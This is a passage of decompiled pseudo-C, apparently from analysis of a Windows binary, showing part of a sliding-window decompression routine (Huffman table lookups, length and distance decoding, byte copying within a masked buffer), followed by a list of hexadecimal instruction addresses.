                                                    																		_t363 =  *(_t725 + 0x18);
                                                    																		__eflags = _t681;
                                                    																		if(_t681 == 0) {
                                                    																			goto L11;
                                                    																		}
                                                    																		_t388 =  *(_t686 + 0xe6dc);
                                                    																		do {
                                                    																			_t389 = _t388 & _t704;
                                                    																			_t704 = _t704 + 1;
                                                    																			 *((char*)( *((intOrPtr*)(_t686 + 0x4b40)) + _t640)) =  *((intOrPtr*)(_t389 +  *((intOrPtr*)(_t686 + 0x4b40))));
                                                    																			_t388 =  *(_t686 + 0xe6dc);
                                                    																			_t640 =  *(_t686 + 0x7c) + 0x00000001 & _t388;
                                                    																			 *(_t686 + 0x7c) = _t640;
                                                    																			_t681 = _t681 - 1;
                                                    																			__eflags = _t681;
                                                    																		} while (_t681 != 0);
                                                    																		goto L35;
                                                    																	} else {
                                                    																		__eflags = _t640 - _t385;
                                                    																		if(_t640 >= _t385) {
                                                    																			goto L140;
                                                    																		}
                                                    																		_t391 =  *((intOrPtr*)(_t686 + 0x4b40));
                                                    																		_t521 = _t391 + _t704;
                                                    																		_t710 = _t391 + _t640;
                                                    																		_t643 = 8;
                                                    																		 *(_t686 + 0x7c) = _t640 + _t681;
                                                    																		__eflags = _t681 - _t643;
                                                    																		if(_t681 < _t643) {
                                                    																			L84:
                                                    																			_t363 =  *(_t725 + 0x18);
                                                    																			_t524 =  *(_t725 + 0x10);
                                                    																			__eflags = _t681;
                                                    																			if(_t681 == 0) {
                                                    																				L10:
                                                    																				_t520 =  *((intOrPtr*)(_t725 + 0x4c));
                                                    																				L11:
                                                    																				_t705 =  *(_t725 + 0x14);
                                                    																				continue;
                                                    																				do {
                                                    																					do {
                                                    																						_t673 =  *(_t686 + 0xe6dc);
                                                    																						_t628 =  *(_t686 + 0x7c) & _t673;
                                                    																						 *(_t686 + 0x7c) = _t628;
                                                    																						_t525 =  *_t524;
                                                    																						__eflags = _t525 -  *(_t725 + 0x2c);
                                                    																						if(_t525 <  *(_t725 + 0x2c)) {
                                                    																							goto L19;
                                                    																						}
                                                    																						goto L13;
                                                    																					} while (_t681 == 0);
                                                    																					_t646 =  *(_t686 + 0x7c);
                                                    																					_t561 =  *(_t686 + 0x60);
                                                    																					_t421 =  *((intOrPtr*)(_t686 + 0xe6d8)) + 0xffffeffc;
                                                    																					_t709 = _t646 - _t561;
                                                    																					__eflags = _t709 - _t421;
                                                    																					if(_t709 >= _t421) {
                                                    																						L112:
                                                    																						_t422 =  *(_t686 + 0xe6dc);
                                                    																						do {
                                                    																							_t423 = _t422 & _t709;
                                                    																							_t709 = _t709 + 1;
                                                    																							 *((char*)( *((intOrPtr*)(_t686 + 0x4b40)) + _t646)) =  *((intOrPtr*)(_t423 +  *((intOrPtr*)(_t686 + 0x4b40))));
                                                    																							_t422 =  *(_t686 + 0xe6dc);
                                                    																							_t646 =  *(_t686 + 0x7c) + 0x00000001 & _t422;
                                                    																							 *(_t686 + 0x7c) = _t646;
                                                    																							_t681 = _t681 - 1;
                                                    																							__eflags = _t681;
                                                    																						} while (_t681 != 0);
                                                    																						L35:
                                                    																						_t524 =  *(_t725 + 0x10);
                                                    																						_t363 =  *(_t725 + 0x18);
                                                    																						goto L11;
                                                    																					}
                                                    																					__eflags = _t646 - _t421;
                                                    																					if(_t646 >= _t421) {
                                                    																						goto L112;
                                                    																					}
                                                    																					_t425 =  *((intOrPtr*)(_t686 + 0x4b40));
                                                    																					_t521 = _t425 + _t709;
                                                    																					_t710 = _t425 + _t646;
                                                    																					_t649 = 8;
                                                    																					 *(_t686 + 0x7c) = _t646 + _t681;
                                                    																					__eflags = _t681 - _t649;
                                                    																					if(_t681 < _t649) {
                                                    																						goto L84;
                                                    																					}
                                                    																					__eflags = _t561 - _t681;
                                                    																					if(_t561 >= _t681) {
                                                    																						_t428 = _t681 >> 3;
                                                    																						__eflags = _t428;
                                                    																						 *(_t725 + 0x34) = _t428;
                                                    																						_t688 = _t428;
                                                    																						do {
                                                    																							E00CE0320(_t710, _t521, _t649);
                                                    																							_t725 = _t725 + 0xc;
                                                    																							_t649 = 8;
                                                    																							_t521 = _t521 + _t649;
                                                    																							_t710 = _t710 + _t649;
                                                    																							_t681 = _t681 - _t649;
                                                    																							_t688 = _t688 - 1;
                                                    																							__eflags = _t688;
                                                    																						} while (_t688 != 0);
                                                    																						L83:
                                                    																						_t686 =  *(_t725 + 0x24);
                                                    																						goto L84;
                                                    																					}
                                                    																					_t564 = _t681 >> 3;
                                                    																					__eflags = _t564;
                                                    																					do {
                                                    																						_t681 = _t681 - _t649;
                                                    																						 *_t710 =  *_t521;
                                                    																						 *((char*)(_t710 + 1)) =  *((intOrPtr*)(_t521 + 1));
                                                    																						 *((char*)(_t710 + 2)) =  *((intOrPtr*)(_t521 + 2));
                                                    																						 *((char*)(_t710 + 3)) =  *((intOrPtr*)(_t521 + 3));
                                                    																						 *((char*)(_t710 + 4)) =  *((intOrPtr*)(_t521 + 4));
                                                    																						 *((char*)(_t710 + 5)) =  *((intOrPtr*)(_t521 + 5));
                                                    																						 *((char*)(_t710 + 6)) =  *((intOrPtr*)(_t521 + 6));
                                                    																						_t437 =  *((intOrPtr*)(_t521 + 7));
                                                    																						_t521 = _t521 + _t649;
                                                    																						 *((char*)(_t710 + 7)) = _t437;
                                                    																						_t710 = _t710 + _t649;
                                                    																						_t564 = _t564 - 1;
                                                    																						__eflags = _t564;
                                                    																					} while (_t564 != 0);
                                                    																					goto L84;
                                                    																					L92:
                                                    																					_t524 =  *(_t725 + 0x10);
                                                    																					_t705 =  *(_t725 + 0x14);
                                                    																					_t363 =  *(_t725 + 0x18);
                                                    																					__eflags = _t681;
                                                    																				} while (_t681 == 0);
                                                    																				_t463 =  *(_t686 + 0xe6dc);
                                                    																				_t716 =  *(_t725 + 0x34);
                                                    																				do {
                                                    																					_t464 = _t463 & _t716;
                                                    																					_t716 = _t716 + 1;
                                                    																					 *((char*)( *((intOrPtr*)(_t686 + 0x4b40)) + _t658)) =  *((intOrPtr*)(_t464 +  *((intOrPtr*)(_t686 + 0x4b40))));
                                                    																					_t463 =  *(_t686 + 0xe6dc);
                                                    																					_t658 =  *(_t686 + 0x7c) + 0x00000001 & _t463;
                                                    																					 *(_t686 + 0x7c) = _t658;
                                                    																					_t681 = _t681 - 1;
                                                    																					__eflags = _t681;
                                                    																				} while (_t681 != 0);
                                                    																				goto L35;
                                                    																			}
                                                    																			 *_t710 =  *_t521;
                                                    																			_t363 =  *(_t725 + 0x18);
                                                    																			__eflags = _t681 - 1;
                                                    																			if(_t681 <= 1) {
                                                    																				goto L10;
                                                    																			}
                                                    																			 *((char*)(_t710 + 1)) =  *((intOrPtr*)(_t521 + 1));
                                                    																			_t363 =  *(_t725 + 0x18);
                                                    																			__eflags = _t681 - 2;
                                                    																			if(_t681 <= 2) {
                                                    																				goto L10;
                                                    																			}
                                                    																			 *((char*)(_t710 + 2)) =  *((intOrPtr*)(_t521 + 2));
                                                    																			_t363 =  *(_t725 + 0x18);
                                                    																			__eflags = _t681 - 3;
                                                    																			if(_t681 <= 3) {
                                                    																				goto L10;
                                                    																			}
                                                    																			 *((char*)(_t710 + 3)) =  *((intOrPtr*)(_t521 + 3));
                                                    																			_t363 =  *(_t725 + 0x18);
                                                    																			__eflags = _t681 - 4;
                                                    																			if(_t681 <= 4) {
                                                    																				goto L10;
                                                    																			}
                                                    																			 *((char*)(_t710 + 4)) =  *((intOrPtr*)(_t521 + 4));
                                                    																			_t363 =  *(_t725 + 0x18);
                                                    																			__eflags = _t681 - 5;
                                                    																			if(_t681 <= 5) {
                                                    																				goto L10;
                                                    																			}
                                                    																			 *((char*)(_t710 + 5)) =  *((intOrPtr*)(_t521 + 5));
                                                    																			_t363 =  *(_t725 + 0x18);
                                                    																			__eflags = _t681 - 6;
                                                    																			if(_t681 <= 6) {
                                                    																				goto L10;
                                                    																			}
                                                    																			_t520 =  *((intOrPtr*)(_t725 + 0x4c));
                                                    																			 *((char*)(_t710 + 6)) =  *((intOrPtr*)(_t521 + 6));
                                                    																			goto L35;
                                                    																		}
                                                    																		__eflags = _t544 - _t681;
                                                    																		if(_t544 >= _t681) {
                                                    																			_t401 = _t681 >> 3;
                                                    																			__eflags = _t401;
                                                    																			 *(_t725 + 0x34) = _t401;
                                                    																			_t687 = _t401;
                                                    																			do {
                                                    																				E00CE0320(_t710, _t521, _t643);
                                                    																				_t725 = _t725 + 0xc;
                                                    																				_t643 = 8;
                                                    																				_t521 = _t521 + _t643;
                                                    																				_t710 = _t710 + _t643;
                                                    																				_t681 = _t681 - _t643;
                                                    																				_t687 = _t687 - 1;
                                                    																				__eflags = _t687;
                                                    																			} while (_t687 != 0);
                                                    																			goto L83;
                                                    																		}
                                                    																		_t547 = _t681 >> 3;
                                                    																		__eflags = _t547;
                                                    																		do {
                                                    																			_t681 = _t681 - _t643;
                                                    																			 *_t710 =  *_t521;
                                                    																			 *((char*)(_t710 + 1)) =  *((intOrPtr*)(_t521 + 1));
                                                    																			 *((char*)(_t710 + 2)) =  *((intOrPtr*)(_t521 + 2));
                                                    																			 *((char*)(_t710 + 3)) =  *((intOrPtr*)(_t521 + 3));
                                                    																			 *((char*)(_t710 + 4)) =  *((intOrPtr*)(_t521 + 4));
                                                    																			 *((char*)(_t710 + 5)) =  *((intOrPtr*)(_t521 + 5));
                                                    																			 *((char*)(_t710 + 6)) =  *((intOrPtr*)(_t521 + 6));
                                                    																			_t410 =  *((intOrPtr*)(_t521 + 7));
                                                    																			_t521 = _t521 + _t643;
                                                    																			 *((char*)(_t710 + 7)) = _t410;
                                                    																			_t710 = _t710 + _t643;
                                                    																			_t547 = _t547 - 1;
                                                    																			__eflags = _t547;
                                                    																		} while (_t547 != 0);
                                                    																		goto L84;
                                                    																	}
                                                    																}
                                                    																_t555 = _t520 + (_t378 + 0xb3e) * 4;
                                                    																while(1) {
                                                    																	__eflags = _t637 -  *_t555;
                                                    																	if(_t637 <  *_t555) {
                                                    																		break;
                                                    																	}
                                                    																	_t378 = _t378 + 1;
                                                    																	_t555 = _t555 + 4;
                                                    																	__eflags = _t378 - 0xf;
                                                    																	if(_t378 < 0xf) {
                                                    																		continue;
                                                    																	}
                                                    																	goto L125;
                                                    																}
                                                    																_t676 = _t378;
                                                    																goto L125;
                                                    															}
                                                    															_t556 = 0x10;
                                                    															_t645 = _t637 >> _t556 - _t377;
                                                    															_t559 = ( *(_t645 + _t520 + 0x2d7c) & 0x000000ff) + _t699[1];
                                                    															 *_t699 =  *_t699 + (_t559 >> 3);
                                                    															_t560 = _t559 & 0x00000007;
                                                    															 *(_t725 + 0x30) =  *_t699;
                                                    															_t699[1] = _t560;
                                                    															_t383 =  *(_t520 + 0x317c + _t645 * 2) & 0x0000ffff;
                                                    															 *(_t725 + 0x34) = _t560;
                                                    															goto L126;
                                                    														} else {
                                                    															goto L116;
                                                    														}
                                                    														do {
                                                    															L116:
                                                    															 *_t534 =  *(_t534 - 4);
                                                    															_t534 = _t534 - 4;
                                                    															_t635 = _t635 - 1;
                                                    															__eflags = _t635;
                                                    														} while (_t635 != 0);
                                                    														goto L117;
                                                    													}
                                                    													_t681 =  *(_t686 + 0x74);
                                                    													_t705 =  *(_t725 + 0x14);
                                                    													_t363 =  *(_t725 + 0x18);
                                                    													__eflags = _t681;
                                                    												}
                                                    												_push(_t725 + 0x38);
                                                    												_t439 = E00CD3F9D(_t686, _t524);
                                                    												__eflags = _t439;
                                                    												if(_t439 == 0) {
                                                    													goto L145;
                                                    												}
                                                    												_t441 = E00CD253E(_t686, _t725 + 0x38);
                                                    												__eflags = _t441;
                                                    												if(_t441 == 0) {
                                                    													goto L145;
                                                    												}
                                                    												goto L35;
                                                    											}
                                                    											_t682 = _t634 - 0x106;
                                                    											__eflags = _t682 - 8;
                                                    											if(_t682 >= 8) {
                                                    												_t444 = (_t682 >> 2) - 1;
                                                    												 *(_t725 + 0x34) = _t444;
                                                    												_t681 = ((_t682 & 0x00000003 | 0x00000004) << _t444) + 2;
                                                    												__eflags = _t444;
                                                    												if(_t444 == 0) {
                                                    													L39:
                                                    													_t445 =  *(_t725 + 0x10);
                                                    													L40:
                                                    													_t446 = E00CCA89D(_t445);
                                                    													_t447 =  *(_t520 + 0xfa0);
                                                    													_t651 = _t446 & 0x0000fffe;
                                                    													__eflags = _t651 -  *((intOrPtr*)(_t520 + 0xf20 + _t447 * 4));
                                                    													if(_t651 >=  *((intOrPtr*)(_t520 + 0xf20 + _t447 * 4))) {
                                                    														_t711 = 0xf;
                                                    														_t448 = _t447 + 1;
                                                    														 *(_t725 + 0x28) = _t711;
                                                    														__eflags = _t448 - _t711;
                                                    														if(_t448 >= _t711) {
                                                    															L50:
                                                    															_t569 =  *(_t725 + 0x10);
                                                    															_t713 = _t569[1] +  *(_t725 + 0x2c);
                                                    															_t714 = _t713 & 0x00000007;
                                                    															 *_t569 =  *_t569 + (_t713 >> 3);
                                                    															 *(_t725 + 0x24) =  *_t569;
                                                    															_t452 =  *(_t725 + 0x2c);
                                                    															_t569[1] = _t714;
                                                    															_t570 = 0x10;
                                                    															 *(_t725 + 0x1c) = _t714;
                                                    															_t573 =  *((intOrPtr*)(_t520 + 0xf60 + _t452 * 4)) + (_t651 -  *((intOrPtr*)(_t520 + 0xf1c + _t452 * 4)) >> _t570 - _t452);
                                                    															__eflags = _t573 -  *((intOrPtr*)(_t520 + 0xf1c));
                                                    															asm("sbb eax, eax");
                                                    															_t453 = _t452 & _t573;
                                                    															__eflags = _t453;
                                                    															_t454 =  *(_t520 + 0x1ba4 + _t453 * 2) & 0x0000ffff;
                                                    															L51:
                                                    															_t654 = _t454 & 0x0000ffff;
                                                    															__eflags = _t654 - 4;
                                                    															if(_t654 >= 4) {
                                                    																_t457 = (_t654 >> 1) - 1;
                                                    																 *(_t725 + 0x30) = _t457;
                                                    																_t575 = ((_t654 & 0x00000001 | 0x00000002) << _t457) + 1;
                                                    																 *(_t725 + 0x34) = _t575;
                                                    																_t715 = _t575;
                                                    																 *(_t725 + 0x28) = _t715;
                                                    																__eflags = _t457;
                                                    																if(_t457 == 0) {
                                                    																	L70:
                                                    																	__eflags = _t715 - 0x100;
                                                    																	if(_t715 > 0x100) {
                                                    																		_t681 = _t681 + 1;
                                                    																		__eflags = _t715 - 0x2000;
                                                    																		if(_t715 > 0x2000) {
                                                    																			_t681 = _t681 + 1;
                                                    																			__eflags = _t715 - 0x40000;
                                                    																			if(_t715 > 0x40000) {
                                                    																				_t681 = _t681 + 1;
                                                    																				__eflags = _t681;
                                                    																			}
                                                    																		}
                                                    																	}
                                                    																	 *(_t686 + 0x6c) =  *(_t686 + 0x68);
                                                    																	 *(_t686 + 0x68) =  *(_t686 + 0x64);
                                                    																	 *(_t686 + 0x64) =  *(_t686 + 0x60);
                                                    																	 *(_t686 + 0x60) = _t715;
                                                    																	_t658 =  *(_t686 + 0x7c);
                                                    																	_t577 = _t658 - _t715;
                                                    																	_t462 =  *((intOrPtr*)(_t686 + 0xe6d8)) + 0xffffeffc;
                                                    																	 *(_t686 + 0x74) = _t681;
                                                    																	 *(_t725 + 0x34) = _t577;
                                                    																	__eflags = _t577 - _t462;
                                                    																	if(_t577 >= _t462) {
                                                    																		goto L92;
                                                    																	} else {
                                                    																		__eflags = _t658 - _t462;
                                                    																		if(_t658 >= _t462) {
                                                    																			goto L92;
                                                    																		}
                                                    																		_t466 =  *((intOrPtr*)(_t686 + 0x4b40));
                                                    																		_t710 = _t466 + _t658;
                                                    																		_t521 = _t466 + _t577;
                                                    																		_t661 = 8;
                                                    																		 *(_t686 + 0x7c) = _t658 + _t681;
                                                    																		__eflags = _t681 - _t661;
                                                    																		if(_t681 < _t661) {
                                                    																			goto L84;
                                                    																		}
                                                    																		__eflags =  *(_t725 + 0x28) - _t681;
                                                    																		if( *(_t725 + 0x28) >= _t681) {
                                                    																			_t469 = _t681 >> 3;
                                                    																			__eflags = _t469;
                                                    																			 *(_t725 + 0x34) = _t469;
                                                    																			_t689 = _t469;
                                                    																			do {
                                                    																				E00CE0320(_t710, _t521, _t661);
                                                    																				_t725 = _t725 + 0xc;
                                                    																				_t661 = 8;
                                                    																				_t521 = _t521 + _t661;
                                                    																				_t710 = _t710 + _t661;
                                                    																				_t681 = _t681 - _t661;
                                                    																				_t689 = _t689 - 1;
                                                    																				__eflags = _t689;
                                                    																			} while (_t689 != 0);
                                                    																			goto L83;
                                                    																		}
                                                    																		_t580 = _t681 >> 3;
                                                    																		__eflags = _t580;
                                                    																		do {
                                                    																			_t681 = _t681 - _t661;
                                                    																			 *_t710 =  *_t521;
                                                    																			 *((char*)(_t710 + 1)) =  *((intOrPtr*)(_t521 + 1));
                                                    																			 *((char*)(_t710 + 2)) =  *((intOrPtr*)(_t521 + 2));
                                                    																			 *((char*)(_t710 + 3)) =  *((intOrPtr*)(_t521 + 3));
                                                    																			 *((char*)(_t710 + 4)) =  *((intOrPtr*)(_t521 + 4));
                                                    																			 *((char*)(_t710 + 5)) =  *((intOrPtr*)(_t521 + 5));
                                                    																			 *((char*)(_t710 + 6)) =  *((intOrPtr*)(_t521 + 6));
                                                    																			_t478 =  *((intOrPtr*)(_t521 + 7));
                                                    																			_t521 = _t521 + _t661;
                                                    																			 *((char*)(_t710 + 7)) = _t478;
                                                    																			_t710 = _t710 + _t661;
                                                    																			_t580 = _t580 - 1;
                                                    																			__eflags = _t580;
                                                    																		} while (_t580 != 0);
                                                    																		goto L84;
                                                    																	}
                                                    																}
                                                    																__eflags = _t457 - 4;
                                                    																if(__eflags < 0) {
                                                    																	_t479 = E00CD8934( *(_t725 + 0x10));
                                                    																	_t662 =  *(_t725 + 0x10);
                                                    																	_t582 = 0x20;
                                                    																	_t585 =  *(_t725 + 0x1c) +  *(_t725 + 0x30);
                                                    																	_t715 = (_t479 >> _t582 -  *(_t725 + 0x30)) +  *(_t725 + 0x34);
                                                    																	_t586 = _t585 & 0x00000007;
                                                    																	__eflags = _t586;
                                                    																	 *_t662 = (_t585 >> 3) +  *(_t725 + 0x20);
                                                    																	_t662[1] = _t586;
                                                    																	L69:
                                                    																	 *(_t725 + 0x28) = _t715;
                                                    																	goto L70;
                                                    																}
                                                    																if(__eflags <= 0) {
                                                    																	_t483 =  *(_t725 + 0x10);
                                                    																} else {
                                                    																	_t499 = E00CD8934( *(_t725 + 0x10));
                                                    																	_t500 =  *(_t725 + 0x30);
                                                    																	_t604 = 0x24;
                                                    																	_t607 =  *(_t725 + 0x1c) + _t500 + 0xfffffffc;
                                                    																	_t715 = (_t499 >> _t604 - _t500 << 4) +  *(_t725 + 0x34);
                                                    																	_t669 =  *(_t725 + 0x20) + (_t607 >> 3);
                                                    																	_t483 =  *(_t725 + 0x10);
                                                    																	_t608 = _t607 & 0x00000007;
                                                    																	 *(_t725 + 0x20) = _t669;
                                                    																	 *(_t725 + 0x1c) = _t608;
                                                    																	 *_t483 = _t669;
                                                    																	_t483[1] = _t608;
                                                    																}
                                                    																_t484 = E00CCA89D(_t483);
                                                    																_t485 =  *(_t520 + 0x1e8c);
                                                    																_t664 = _t484 & 0x0000fffe;
                                                    																__eflags = _t664 -  *((intOrPtr*)(_t520 + 0x1e0c + _t485 * 4));
                                                    																if(_t664 >=  *((intOrPtr*)(_t520 + 0x1e0c + _t485 * 4))) {
                                                    																	_t588 = 0xf;
                                                    																	_t486 = _t485 + 1;
                                                    																	 *(_t725 + 0x28) = _t588;
                                                    																	__eflags = _t486 - _t588;
                                                    																	if(_t486 >= _t588) {
                                                    																		L66:
                                                    																		_t690 =  *(_t725 + 0x10);
                                                    																		_t590 = ( *(_t725 + 0x10))[1] +  *(_t725 + 0x2c);
                                                    																		 *_t690 =  *_t690 + (_t590 >> 3);
                                                    																		_t690[1] = _t590 & 0x00000007;
                                                    																		_t491 =  *(_t725 + 0x2c);
                                                    																		_t592 = 0x10;
                                                    																		_t595 =  *((intOrPtr*)(_t520 + 0x1e4c + _t491 * 4)) + (_t664 -  *((intOrPtr*)(_t520 + 0x1e08 + _t491 * 4)) >> _t592 - _t491);
                                                    																		__eflags = _t595 -  *((intOrPtr*)(_t520 + 0x1e08));
                                                    																		asm("sbb eax, eax");
                                                    																		_t492 = _t491 & _t595;
                                                    																		__eflags = _t492;
                                                    																		_t493 =  *(_t520 + 0x2a90 + _t492 * 2) & 0x0000ffff;
                                                    																		goto L67;
                                                    																	}
                                                    																	_t597 = _t520 + (_t486 + 0x783) * 4;
                                                    																	while(1) {
                                                    																		__eflags = _t664 -  *_t597;
                                                    																		if(_t664 <  *_t597) {
                                                    																			break;
                                                    																		}
                                                    																		_t486 = _t486 + 1;
                                                    																		_t597 = _t597 + 4;
                                                    																		__eflags = _t486 - 0xf;
                                                    																		if(_t486 < 0xf) {
                                                    																			continue;
                                                    																		}
                                                    																		goto L66;
                                                    																	}
                                                    																	 *(_t725 + 0x28) = _t486;
                                                    																	goto L66;
                                                    																} else {
                                                    																	_t691 =  *(_t725 + 0x10);
                                                    																	_t598 = 0x10;
                                                    																	_t667 = _t664 >> _t598 - _t485;
                                                    																	_t601 = ( *(_t667 + _t520 + 0x1e90) & 0x000000ff) +  *(_t725 + 0x1c);
                                                    																	 *_t691 = (_t601 >> 3) +  *(_t725 + 0x20);
                                                    																	_t691[1] = _t601 & 0x00000007;
                                                    																	_t493 =  *(_t520 + 0x2290 + _t667 * 2) & 0x0000ffff;
                                                    																	L67:
                                                    																	_t686 =  *(_t725 + 0x24);
                                                    																	_t715 = _t715 + (_t493 & 0x0000ffff);
                                                    																	goto L69;
                                                    																}
                                                    															}
                                                    															_t715 = _t654 + 1;
                                                    															goto L69;
                                                    														}
                                                    														_t610 = _t520 + (_t448 + 0x3c8) * 4;
                                                    														while(1) {
                                                    															__eflags = _t651 -  *_t610;
                                                    															if(_t651 <  *_t610) {
                                                    																break;
                                                    															}
                                                    															_t448 = _t448 + 1;
                                                    															_t610 = _t610 + 4;
                                                    															__eflags = _t448 - _t711;
                                                    															if(_t448 < _t711) {
                                                    																continue;
                                                    															}
                                                    															goto L50;
                                                    														}
                                                    														 *(_t725 + 0x28) = _t448;
                                                    														goto L50;
                                                    													}
                                                    													_t611 = 0x10;
                                                    													_t670 = _t651 >> _t611 - _t447;
                                                    													_t614 = ( *(_t670 + _t520 + 0xfa4) & 0x000000ff) + _t697;
                                                    													_t723 =  *(_t725 + 0x1c) + (_t614 >> 3);
                                                    													_t506 =  *(_t725 + 0x10);
                                                    													_t615 = _t614 & 0x00000007;
                                                    													 *(_t725 + 0x20) = _t723;
                                                    													 *(_t725 + 0x1c) = _t615;
                                                    													 *_t506 = _t723;
                                                    													_t506[1] = _t615;
                                                    													_t454 =  *(_t520 + 0x13a4 + _t670 * 2) & 0x0000ffff;
                                                    													goto L51;
                                                    												}
                                                    												_t507 = E00CCA89D( *(_t725 + 0x10));
                                                    												_t724 = _t697 +  *(_t725 + 0x34);
                                                    												_t617 = 0x10;
                                                    												_t681 = _t681 + (_t507 >> _t617 -  *(_t725 + 0x34));
                                                    												_t620 =  *(_t725 + 0x1c) + (_t724 >> 3);
                                                    												_t445 =  *(_t725 + 0x10);
                                                    												_t697 = _t724 & 0x00000007;
                                                    												 *(_t725 + 0x1c) = _t620;
                                                    												 *_t445 = _t620;
                                                    												_t445[1] = _t697;
                                                    												goto L40;
                                                    											}
                                                    											 *(_t725 + 0x1c) = _t375;
                                                    											_t681 = _t682 + 2;
                                                    											__eflags = _t681;
                                                    											goto L39;
                                                    										}
                                                    										 *( *((intOrPtr*)(_t686 + 0x4b40)) +  *(_t686 + 0x7c)) = _t634;
                                                    										_t72 = _t686 + 0x7c;
                                                    										 *_t72 =  *(_t686 + 0x7c) + 1;
                                                    										__eflags =  *_t72;
                                                    										goto L35;
                                                    									}
                                                    									_t623 = _t520 + (_t369 + 0xd) * 4;
                                                    									while(1) {
                                                    										__eflags = _t630 -  *_t623;
                                                    										if(_t630 <  *_t623) {
                                                    											break;
                                                    										}
                                                    										_t369 = _t369 + 1;
                                                    										_t623 = _t623 + 4;
                                                    										__eflags = _t369 - 0xf;
                                                    										if(_t369 < 0xf) {
                                                    											continue;
                                                    										}
                                                    										_t528 =  *(_t725 + 0x28);
                                                    										goto L32;
                                                    									}
                                                    									_t528 = _t369;
                                                    									 *(_t725 + 0x28) = _t369;
                                                    									goto L32;
                                                    								}
                                                    								_t624 = 0x10;
                                                    								_t671 = _t630 >> _t624 - _t368;
                                                    								_t524 = _t674;
                                                    								_t707 = ( *(_t671 + _t520 + 0xb8) & 0x000000ff) + _t524[1];
                                                    								 *_t524 =  *_t524 + (_t707 >> 3);
                                                    								_t697 = _t707 & 0x00000007;
                                                    								_t375 =  *_t524;
                                                    								_t524[1] = _t697;
                                                    								_t633 =  *(_t520 + 0x4b8 + _t671 * 2) & 0x0000ffff;
                                                    								 *(_t725 + 0x1c) = _t375;
                                                    								goto L33;
                                                    							}
                                                    							__eflags = _t526 - _t628;
                                                    							if(_t526 == _t628) {
                                                    								goto L24;
                                                    							}
                                                    							E00CD5202(_t686);
                                                    							__eflags =  *((intOrPtr*)(_t686 + 0x4c5c)) -  *((intOrPtr*)(_t686 + 0x4c4c));
                                                    							if(__eflags > 0) {
                                                    								L6:
                                                    								return 0;
                                                    							}
                                                    							if(__eflags < 0) {
                                                    								goto L24;
                                                    							}
                                                    							__eflags =  *((intOrPtr*)(_t686 + 0x4c58)) -  *((intOrPtr*)(_t686 + 0x4c48));
                                                    							if( *((intOrPtr*)(_t686 + 0x4c58)) >  *((intOrPtr*)(_t686 + 0x4c48))) {
                                                    								goto L6;
                                                    							}
                                                    							goto L24;
                                                    						}
                                                    					}
                                                    					L5:
                                                    					 *((char*)(_t520 + 0x4ad0)) = 1;
                                                    					goto L6;
                                                    				}
                                                    				 *((char*)(_t520 + 0x2c)) = 1;
                                                    				_push(_t520 + 0x30);
                                                    				_push(_t672);
                                                    				_push(_t692);
                                                    				if(E00CD43BF(__ecx) == 0) {
                                                    					goto L5;
                                                    				} else {
                                                    					goto L4;
                                                    				}
                                                    			}

                                                    0x00cd7ced
                                                    0x00cd7cf3
                                                    0x00cd7cf6
                                                    0x00cd7cf9
                                                    0x00cd7d04
                                                    0x00cd7d06
                                                    0x00cd7d0b
                                                    0x00cd7d0e
                                                    0x00cd7d12
                                                    0x00cd7d14
                                                    0x00000000
                                                    0x00cd7d1a
                                                    0x00cd7d1a
                                                    0x00cd7d1c
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd7d22
                                                    0x00cd7d2a
                                                    0x00cd7d2d
                                                    0x00cd7d33
                                                    0x00cd7d34
                                                    0x00cd7d37
                                                    0x00cd7d39
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd7d3b
                                                    0x00cd7d3f
                                                    0x00cd7d84
                                                    0x00cd7d84
                                                    0x00cd7d87
                                                    0x00cd7d8b
                                                    0x00cd7d8d
                                                    0x00cd7d90
                                                    0x00cd7d95
                                                    0x00cd7d9a
                                                    0x00cd7d9b
                                                    0x00cd7d9d
                                                    0x00cd7d9f
                                                    0x00cd7da1
                                                    0x00cd7da1
                                                    0x00cd7da1
                                                    0x00000000
                                                    0x00cd7d8d
                                                    0x00cd7d43
                                                    0x00cd7d43
                                                    0x00cd7d46
                                                    0x00cd7d48
                                                    0x00cd7d4a
                                                    0x00cd7d50
                                                    0x00cd7d56
                                                    0x00cd7d5c
                                                    0x00cd7d62
                                                    0x00cd7d68
                                                    0x00cd7d6e
                                                    0x00cd7d71
                                                    0x00cd7d74
                                                    0x00cd7d76
                                                    0x00cd7d79
                                                    0x00cd7d7b
                                                    0x00cd7d7b
                                                    0x00cd7d7b
                                                    0x00000000
                                                    0x00cd7d80
                                                    0x00cd7d14
                                                    0x00cd7b6a
                                                    0x00cd7b6d
                                                    0x00cd7c94
                                                    0x00cd7c99
                                                    0x00cd7ca1
                                                    0x00cd7cac
                                                    0x00cd7cb0
                                                    0x00cd7cbd
                                                    0x00cd7cbd
                                                    0x00cd7cc0
                                                    0x00cd7cc2
                                                    0x00cd7cc5
                                                    0x00cd7cc5
                                                    0x00000000
                                                    0x00cd7cc5
                                                    0x00cd7b73
                                                    0x00cd7bbc
                                                    0x00cd7b75
                                                    0x00cd7b79
                                                    0x00cd7b84
                                                    0x00cd7b8a
                                                    0x00cd7b96
                                                    0x00cd7b9b
                                                    0x00cd7ba4
                                                    0x00cd7ba6
                                                    0x00cd7baa
                                                    0x00cd7bad
                                                    0x00cd7bb1
                                                    0x00cd7bb5
                                                    0x00cd7bb7
                                                    0x00cd7bb7
                                                    0x00cd7bc2
                                                    0x00cd7bc9
                                                    0x00cd7bcf
                                                    0x00cd7bd5
                                                    0x00cd7bdc
                                                    0x00cd7c14
                                                    0x00cd7c15
                                                    0x00cd7c16
                                                    0x00cd7c1a
                                                    0x00cd7c1c
                                                    0x00cd7c3a
                                                    0x00cd7c3e
                                                    0x00cd7c47
                                                    0x00cd7c53
                                                    0x00cd7c57
                                                    0x00cd7c5a
                                                    0x00cd7c5e
                                                    0x00cd7c71
                                                    0x00cd7c73
                                                    0x00cd7c79
                                                    0x00cd7c7b
                                                    0x00cd7c7b
                                                    0x00cd7c7d
                                                    0x00000000
                                                    0x00cd7c7d
                                                    0x00cd7c24
                                                    0x00cd7c27
                                                    0x00cd7c27
                                                    0x00cd7c29
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd7c2b
                                                    0x00cd7c2c
                                                    0x00cd7c2f
                                                    0x00cd7c32
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd7c34
                                                    0x00cd7c36
                                                    0x00000000
                                                    0x00cd7bde
                                                    0x00cd7bde
                                                    0x00cd7be4
                                                    0x00cd7be7
                                                    0x00cd7bf1
                                                    0x00cd7c01
                                                    0x00cd7c05
